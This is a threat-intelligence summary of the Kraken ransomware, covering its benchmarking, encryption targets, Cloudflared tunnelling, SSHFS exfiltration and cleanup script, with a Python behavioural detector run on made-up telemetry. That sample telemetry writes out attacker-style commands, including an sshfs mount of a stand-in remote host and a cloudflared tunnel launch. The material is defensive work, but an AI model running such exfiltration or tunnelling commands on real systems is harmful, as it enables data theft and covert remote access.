Full Report
The Kraken ransomware, which targets Windows and Linux/VMware ESXi systems, tests machines to check how fast it can encrypt data without overloading them. [...]
Analysis Summary
# Tool/Technique: Kraken Ransomware
## Overview
Kraken is a ransomware strain targeting both Windows and Linux/VMware ESXi systems. A notable feature is its system benchmarking capability, where it tests encryption speeds using temporary files to decide between full or partial data encryption to maximize damage without system overload. It operates under a double extortion model, incorporating data theft. Kraken is considered a continuation of the HelloKitty operation.
## Technical Details
- Type: Malware family (Ransomware)
- Platform: Windows, Linux, VMware ESXi
- Capabilities: System performance benchmarking for optimal encryption, data theft, encryption of SQL databases, network shares, and VM disks, double extortion.
- First Seen: Emerged at the beginning of 2025 (the source article is dated November 2025).
## MITRE ATT&CK Mapping
*Note: Specific TTPs are inferred from the operational details described.*
- T1486 - Data Encrypted for Impact
- T1486.002 - Encrypting System Files
- T1021 - Remote Services
- T1021.001 - Remote Desktop Protocol
- T1070 - Indicator Removal
- T1070.004 - File Deletion (removal of the `_bye_bye.sh` script, logs, and the binary)
- T1560 - Archive Collected Data
- T1560.001 - Archive via Utility
- T1003 - OS Credential Dumping (Inferred via administrator credential extraction)
- T1041 - Exfiltration Over C2 Channel (Implied by data theft using SSHFS)
## Functionality
### Core Capabilities
* **System Benchmarking:** Creates a temporary file filled with random data, encrypts it while timing the operation, and uses the measured throughput to decide between full and partial encryption, balancing speed against impact.
* **Targeted Encryption:** Modular approach on Windows to target SQL database files, network shares, local/removable drives, and Hyper-V virtual disk files.
* **VM Targeting (Linux/ESXi):** Enumerates and forcibly terminates running virtual machines before encrypting associated disk files.
* **Persistence & Evasion:** Deletes volume shadow copies, empties the Recycle Bin, and stops backup services before encryption begins, so that local recovery is not possible.
### Advanced Features
* **Double Extortion:** Engages in data theft alongside encryption.
* **Reverse Tunneling:** Deploys **Cloudflared** to create reverse tunnels to attacker infrastructure for remote access and exfiltration.
* **Data Exfiltration:** Uses **SSHFS** to mount remote filesystems for data exfiltration.
* **Self-Destruction:** Executes an auto-generated `_bye_bye.sh` script on Linux systems to remove logs, shell history, the Kraken binary, and the script itself post-encryption.
## Indicators of Compromise
- File Hashes: (Not specified in the text, but stated as available on GitHub)
- File Names:
  - Ransom Note: `readme_you_ws_hacked.txt`
  - Linux Cleanup Script: `_bye_bye.sh`
- Registry Keys: (Not specified; the Windows variant reads the registry to identify SQL instances)
- Network Indicators: (Not specified in the text; C2 infrastructure is implied but not identified)
- Behavioral Indicators:
  * Exploitation of SMB vulnerabilities for initial access.
  * Use of Remote Desktop Protocol (RDP) for lateral movement after credential theft.
  * Deployment and use of the Cloudflared and SSHFS tools.
  * Creation and timing of temporary files for performance assessment.
## Associated Threat Actors
* Threat actors associated with the defunct **HelloKitty** ransomware operation.
## Detection Methods
- Signature-based detection: (Requires specific signatures for Kraken binaries and ransom note strings, details not provided.)
- Behavioral detection: Monitoring for processes that benchmark disk encryption speed via temporary file manipulation, abrupt termination of VM services, or the execution of Cloudflared/SSHFS post-RDP login.
- YARA rules: (Not provided in the text.)
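The behavioral detection described above can be expressed as a few correlation rules. The following is an added example written for this summary, not code from the source article or from any vendor: it runs over constructed endpoint telemetry (the `timestamp|host|user|event|detail` record format, the two-hour RDP-to-tool window, the 30-second temp-file round-trip threshold and the `krk_bench.tmp` file name are all assumptions) and flags the three indicator groups the summary lists: tunnel/exfiltration tools launched shortly after an RDP logon, a temporary file created and deleted within seconds (the benchmarking pattern), and the ransom-note and cleanup-script file names.

```python
"""Added example: behavioural detector for the Kraken indicators listed above,
run over constructed sample telemetry. Record format, field names, the time
windows and the temp file name are assumptions, not facts from the article."""
import re
from datetime import datetime, timedelta

# Indicators taken from the summary above.
RANSOM_NOTE = "readme_you_ws_hacked.txt"
CLEANUP_SCRIPT = "_bye_bye.sh"
TUNNEL_TOOLS = {"cloudflared", "cloudflared.exe", "sshfs"}

# Assumed tuning: tool launch within 2 h of an RDP logon; temp file that
# round-trips (create -> delete) within 30 s is treated as a benchmark probe.
RDP_WINDOW = timedelta(hours=2)
TEMP_ROUNDTRIP = timedelta(seconds=30)

# Constructed sample telemetry: "timestamp|host|user|event|detail" per line.
# Host names, users, IPs (RFC 5737 range) and krk_bench.tmp are made up.
SAMPLE_LOG = """\
2025-11-05T08:00:02|srv-db01|svc_backup|logon|type=10 src=10.0.0.5
2025-11-05T08:05:10|srv-db01|svc_backup|process|cloudflared.exe tunnel run
2025-11-05T08:19:00|srv-db01|svc_backup|file_create|C:\\Windows\\Temp\\krk_bench.tmp
2025-11-05T08:19:03|srv-db01|svc_backup|file_delete|C:\\Windows\\Temp\\krk_bench.tmp
2025-11-05T08:20:00|srv-db01|svc_backup|process|sshfs root@198.51.100.9:/drop /mnt/x
2025-11-05T08:21:13|srv-db01|svc_backup|file_create|C:\\Users\\Public\\readme_you_ws_hacked.txt
2025-11-05T09:00:00|esxi-02|root|process|/tmp/_bye_bye.sh
2025-11-05T10:00:00|ws-17|alice|logon|type=10 src=10.0.0.7
2025-11-05T14:30:00|ws-17|alice|process|cloudflared.exe --version
"""


def parse_events(text):
    """Parse records into (ts, host, user, kind, detail) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, kind, detail = line.split("|", 4)
        events.append((datetime.fromisoformat(ts), host, user, kind, detail))
    return sorted(events, key=lambda e: e[0])


def _basename(detail):
    """Image name of a process record: last path component of the first token."""
    first = detail.split()[0] if detail.split() else ""
    return re.split(r"[\\/]", first)[-1].lower()


def _is_temp_path(path):
    p = path.lower()
    return "\\temp\\" in p or p.startswith("/tmp/")


def detect(events):
    """Return (rule, host, timestamp, detail) alerts for the indicator groups."""
    alerts = []
    last_rdp = {}      # (host, user) -> timestamp of most recent RDP logon
    pending_tmp = {}   # (host, path) -> creation timestamp of a temp file
    for ts, host, user, kind, detail in events:
        low = detail.lower()
        if kind == "logon" and "type=10" in detail:      # RDP interactive logon
            last_rdp[(host, user)] = ts
            continue
        if kind == "process" and _basename(detail) in TUNNEL_TOOLS:
            rdp_ts = last_rdp.get((host, user))
            if rdp_ts is not None and ts - rdp_ts <= RDP_WINDOW:
                alerts.append(("tunnel_tool_after_rdp", host, ts, detail))
        if kind == "file_create" and _is_temp_path(detail):
            pending_tmp[(host, low)] = ts
        elif kind == "file_delete":
            created = pending_tmp.pop((host, low), None)
            if created is not None and ts - created <= TEMP_ROUNDTRIP:
                alerts.append(("temp_file_timed_roundtrip", host, ts, detail))
        if RANSOM_NOTE in low:
            alerts.append(("ransom_note_written", host, ts, detail))
        if CLEANUP_SCRIPT in low:
            alerts.append(("cleanup_script_seen", host, ts, detail))
    return alerts


def run_sample():
    return detect(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for rule, host, ts, detail in run_sample():
        print(f"{ts.isoformat()} {host:8} {rule:26} {detail}")
```

The `ws-17` records show why the window matters: a `cloudflared.exe --version` four and a half hours after an RDP logon is not correlated, which keeps routine administrative use out of the alert stream. The temp-file rule is the weakest of the three on its own and is best scored together with the others rather than alerted in isolation.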
## Mitigation Strategies
* Maintain a strong patching regimen, especially for internet-facing assets exposed to SMB exploitation.
* Implement strong credential management and multi-factor authentication to limit RDP abuse after credential theft.
* Monitor for the execution of utility tools like Cloudflared and SSHFS by non-standard users or in anomalous sequences.
* Maintain offline/immutable backups to counter encryption and data loss.
* Implement Application Control to restrict the execution of unknown binaries or scripts designed for system destruction (like the cleanup script).
## Related Tools/Techniques
* **HelloKitty Ransomware:** Kraken is noted as a continuation/offshoot.
* **Cloudflared:** Used for reverse tunneling (often legitimate, but abused here).
* **SSHFS:** Used for mounting filesystems/exfiltration (abused).